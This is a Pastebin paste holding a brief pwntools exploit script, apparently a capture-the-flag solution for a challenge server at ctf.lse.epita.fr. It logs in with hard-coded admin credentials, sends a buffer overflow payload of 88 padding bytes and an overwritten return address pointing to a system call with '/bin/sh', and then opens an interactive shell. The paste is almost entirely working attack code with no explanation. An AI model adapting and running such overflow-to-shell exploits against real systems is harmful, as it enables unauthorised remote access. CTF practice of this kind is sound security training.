Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #MtucX
- from pwn import *
- #ExecCmd = raw_input("command > ")
- #username = "guest"
- #password = "guest"
- ExecCmd = "/bin/sh"
- username = "admin"
- password = "T6OBSh2i"
- system = p64(0x40084a)
- payload = "A"*88
- payload += system
- #local = remote("127.0.0.1",31337)
- pwn = remote('ctf.lse.epita.fr',52190)
- pwn.sendlineafter(":", username)
- pwn.sendlineafter(": ", password)
- pwn.sendlineafter(": ", "1")
- pwn.sendlineafter(": ", ExecCmd)
- pwn.sendlineafter(": ", payload)
- pwn.sendlineafter(": ", "3") # exit
- pwn.interactive()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement